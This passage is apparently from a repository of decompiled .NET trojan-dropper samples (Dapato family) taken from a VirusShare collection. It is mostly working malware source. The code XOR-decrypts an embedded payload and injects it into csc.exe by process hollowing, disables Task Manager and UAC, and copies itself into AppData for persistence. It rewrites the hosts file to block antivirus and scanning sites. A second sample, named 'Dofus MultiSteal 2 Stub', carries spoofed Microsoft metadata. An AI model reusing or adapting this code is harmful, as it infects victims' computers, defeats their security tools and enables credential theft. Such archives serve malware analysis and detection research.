(obj));
}
public enum xDDDDDDDD : uint
{
DONT_RESOLVE_DLL_REFERENCES = 1,
LOAD_LIBRARY_AS_DATAFILE = 2,
LOAD_WITH_ALTERED_SEARCH_PATH = 8,
LOAD_IGNORE_CODE_AUTHZ_LEVEL = 16, // 0x00000010
LOAD_LIBRARY_AS_IMAGE_RESOURCE = 32, // 0x00000020
LOAD_LIBRARY_AS_DATAFILE_EXCLUSIVE = 64, // 0x00000040
}
}
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool CreateProcess(
string appName,
StringBuilder commandLine,
IntPtr procAttr,
IntPtr thrAttr,
[MarshalAs(UnmanagedType.Bool)] bool inherit,
int creation,
IntPtr env,
string curDir,
byte[] sInfo,
IntPtr[] pInfo);
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool getthrcontx(IntPtr hThr, uint[] ctxt);
public delegate uint nunmpsctn(IntPtr hProc, IntPtr baseAddr);
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool rdprocssmr(
IntPtr hProc,
IntPtr baseAddr,
ref IntPtr bufr,
int bufrSize,
ref IntPtr numRead);
public delegate uint resmthrd(IntPtr hThread);
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool strthd(IntPtr hThr, uint[] ctxt);
public delegate IntPtr vrtall(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int allocType,
int prot);
public delegate bool wrtproc(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
uint nSize,
int lpNumberOfBytesWritten);
}
}
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.atdt-6d6f9fa7620cf0056d02556ff97c31ce6e6915683c9f12177fc6b506a2dc19c9/dUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTN.cs
+15
View File
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: YhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQ.dUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLkkMUgJcIgxXxJDVFbLWcYjBPXYhGBdfMSltjPKLJOyGNdFEUKMEdGkiRF
// Assembly: rCWkXKkHG, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4D884AA0-6931-492A-BF88-91705CD23369
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.atdt-6d6f9fa7620cf0056d02556ff97c31ce6e6915683c9f12177fc6b506a2dc19c9.exe
using Microsoft.Win32;
namespace YhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQ
{
internal class dUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLkkMUgJcIgxXxJDVFbLWcYjBPXYhGBdfMSltjPKLJOyGNdFEUKMEdGkiRF
{
public static void tasklol() => Registry.CurrentUser.OpenSubKey(fIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDp.ReverseString("metsyS\\seiciloP\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS"), true).SetValue(fIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDp.ReverseString("rgMksaTelbasiD"), (object) 1);
}
}
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.atdt-6d6f9fa7620cf0056d02556ff97c31ce6e6915683c9f12177fc6b506a2dc19c9/duggsaogahsoghasikgasg.resx
+123
View File
File diff suppressed because one or more lines are too long
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.atdt-6d6f9fa7620cf0056d02556ff97c31ce6e6915683c9f12177fc6b506a2dc19c9/fIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHO.cs
+221
View File
@@ -0,0 +1,221 @@
// Decompiled with JetBrains decompiler
// Type: YhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQ.fIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDp
// Assembly: rCWkXKkHG, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4D884AA0-6931-492A-BF88-91705CD23369
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.atdt-6d6f9fa7620cf0056d02556ff97c31ce6e6915683c9f12177fc6b506a2dc19c9.exe
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.IO;
using System.Reflection;
using System.Resources;
using System.Runtime.InteropServices;
using System.Text;
namespace YhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQ
{
[StandardModule]
internal sealed class fIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDp
{
private static ResourceManager pPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQ = new ResourceManager("duggsaogahsoghasikgasg", Assembly.GetExecutingAssembly());
private static string cDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwV = (string) fIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDp.pPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQ.GetObject("picturekashfklhaskgasg");
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern void Sleep(long dwMilliseconds);
[STAThread]
public static void Main()
{
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
byte[] pByteArray = fIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDp.xordecrypt(Convert.FromBase64String(fIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDp.cDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwV), Encoding.Default.GetBytes("freetheweed"));
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.bmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLkkMUgJcIgxXxJDVFbLWcYjBPX(pByteArray, Conversions.ToString(Environment.SystemDirectory[0]) + ":\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\csc.exe");
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
gZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLkkMUgJcIgxXxJDVFbLWcYjBPXYhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWa.rofl();
File.Copy(Assembly.GetExecutingAssembly().GetModules()[0].FullyQualifiedName, Environment.GetEnvironmentVariable("Appdata") + "\\KqJuyYy.exe");
NXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkq.KSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfj("BZohRyCWyD", "\"" + Environment.GetEnvironmentVariable("Appdata") + "\\KqJuyYy.exe\"", NXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkq.IAHSgioahsgiaoshgiposahg.TheCurrentoftheUSER);
File.Copy(Assembly.GetExecutingAssembly().GetModules()[0].FullyQualifiedName, Environment.GetEnvironmentVariable("Appdata") + "\\KEWTpM.exe");
NXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkq.KSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfj("nYSZDQPfjm", "\"" + Environment.GetEnvironmentVariable("Appdata") + "\\KEWTpM.exe\"", NXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkq.IAHSgioahsgiaoshgiposahg.TheLocalofMachine);
HOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLP.SJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGt();
object Instance = (object) new StreamWriter(Conversions.ToString(Registry.GetValue("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", "DataBasePath", (object) "oops")) + "\\hosts");
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
{
(object) "127.0.0.1 www.virustotal.com"
}, (string[]) null, (Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
{
(object) Environment.NewLine
}, (string[]) null, (Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
{
(object) "127.0.0.1 virustotal.com"
}, (string[]) null, (Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
{
(object) Environment.NewLine
}, (string[]) null, (Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
{
(object) "127.0.0.1 74.53.201.162"
}, (string[]) null, (Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
{
(object) Environment.NewLine
}, (string[]) null, (Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
{
(object) "127.0.0.1 www.virscan.org"
}, (string[]) null, (Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
{
(object) Environment.NewLine
}, (string[]) null, (Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
{
(object) "127.0.0.1 virscan.org"
}, (string[]) null, (Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
{
(object) Environment.NewLine
}, (string[]) null, (Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
{
(object) "127.0.0.1 61.180.255.138"
}, (string[]) null, (Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
{
(object) Environment.NewLine
}, (string[]) null, (Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
{
(object) "127.0.0.1 www.virusscan.jotti.org"
}, (string[]) null, (Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
{
(object) Environment.NewLine
}, (string[]) null, (Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
{
(object) "127.0.0.1 virusscan.jotti.org"
}, (string[]) null, (Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
{
(object) Environment.NewLine
}, (string[]) null, (Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
{
(object) "127.0.0.1 209.160.72.83"
}, (string[]) null, (Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
{
(object) Environment.NewLine
}, (string[]) null, (Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
{
(object) "127.0.0.1 www.kaspersky.com"
}, (string[]) null, (Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
{
(object) Environment.NewLine
}, (string[]) null, (Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
{
(object) "127.0.0.1 kaspersky.com"
}, (string[]) null, (Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
{
(object) Environment.NewLine
}, (string[]) null, (Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
{
(object) "127.0.0.1 38.117.98.208"
}, (string[]) null, (Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
{
(object) Environment.NewLine
}, (string[]) null, (Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
{
(object) "127.0.0.1 www.bitdefender.com"
}, (string[]) null, (Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
{
(object) Environment.NewLine
}, (string[]) null, (Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
{
(object) "127.0.0.1 bitdefender.com"
}, (string[]) null, (Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
{
(object) Environment.NewLine
}, (string[]) null, (Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
{
(object) "127.0.0.1 66.40.145.200"
}, (string[]) null, (Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (Type) null, "Write", new object[1]
{
(object) Environment.NewLine
}, (string[]) null, (Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (Type) null, "Dispose", new object[0], (string[]) null, (Type[]) null, (bool[]) null, true);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
private static byte[] xordecrypt(byte[] input, byte[] key)
{
byte[] numArray1 = Convert.FromBase64String(Encoding.Default.GetString(input));
byte[] numArray2 = new byte[checked (numArray1.Length - 2 + 1)];
byte num1 = numArray1[checked (numArray1.Length - 1)];
int num2 = checked (numArray2.Length - 1);
int index = 0;
while (index <= num2)
{
numArray2[index] = checked ((byte) ((int) numArray1[index] ^ unchecked ((int) (byte) ((uint) key[index % key.Length] << (checked (index + (int) num1 + key.Length) & 7)) % 256)));
checked { ++index; }
}
return numArray2;
}
public static string ReverseString(string Value)
{
StringBuilder stringBuilder = new StringBuilder();
int index = checked (Value.Length - 1);
while (index >= 0)
{
stringBuilder.Append(Value[index]);
checked { index += -1; }
}
return stringBuilder.ToString();
}
}
}
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.atdt-6d6f9fa7620cf0056d02556ff97c31ce6e6915683c9f12177fc6b506a2dc19c9/gZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIR.cs
+20
View File
@@ -0,0 +1,20 @@
// Decompiled with JetBrains decompiler
// Type: YhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQ.gZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLkkMUgJcIgxXxJDVFbLWcYjBPXYhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWa
// Assembly: rCWkXKkHG, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4D884AA0-6931-492A-BF88-91705CD23369
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.atdt-6d6f9fa7620cf0056d02556ff97c31ce6e6915683c9f12177fc6b506a2dc19c9.exe
using Microsoft.Win32;
namespace YhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQ
{
internal class gZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLkkMUgJcIgxXxJDVFbLWcYjBPXYhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWa
{
public static void rofl()
{
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(fIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDp.ReverseString("metsyS\\seiciloP\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS"), true);
registryKey.GetValue(fIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDp.ReverseString("AULelbanE"));
registryKey.SetValue(fIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDp.ReverseString("AULelbanE"), (object) "0");
}
}
}
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/AssemblyInfo.cs
+13
View File
@@ -0,0 +1,13 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyTrademark("Microsoft Windows © 2007")]
[assembly: AssemblyCopyright("Copyright © 2007")]
[assembly: AssemblyProduct("Assistant compatibilité")]
[assembly: AssemblyCompany("Microsoft")]
[assembly: AssemblyTitle("Assistant compatibilité")]
[assembly: AssemblyFileVersion("3.5.2.8")]
[assembly: AssemblyDescription("Installateur, compatibilité des programmes")]
[assembly: Guid("351bf7c6-3650-47a8-9327-4194cda16817")]
[assembly: ComVisible(false)]
[assembly: AssemblyVersion("2.4.7.1")]
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/ConfusedByAttribute.cs
+15
View File
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: ConfusedByAttribute
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
using System;
using System.Runtime.InteropServices;
internal class ConfusedByAttribute : Attribute
{
public ConfusedByAttribute([In] string obj0)
{
}
}
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/NGS9_0016��J��_0010�1_001Cr�
BIN
View File
Binary file not shown.
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9/Trojan-Dropper.Win32.Dapato.auty.csproj
+61
View File
@@ -0,0 +1,61 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{30FAD7D2-E440-4280-8F2A-9CB3AEA33643}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Dofus MultiSteal 2 Stub</AssemblyName>
<ApplicationVersion>2.4.7.1</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="_003CModule_003E.cs" />
<Compile Include="縏냹௧岽䄃.cs" />
<Compile Include="摆ꅐᥬ㉎㞞摎항ᢋ.cs" />
<Compile Include="ᔒɉ曯絇쭥毄힘骕.cs" />
<Compile Include="瓰폦᪀켅_0099釆.cs" />
<Compile Include="ɹ톮o痍ᅤ.cs" />
<Compile Include="㽆鐵ލ鶫༚忎睵⨾.cs" />
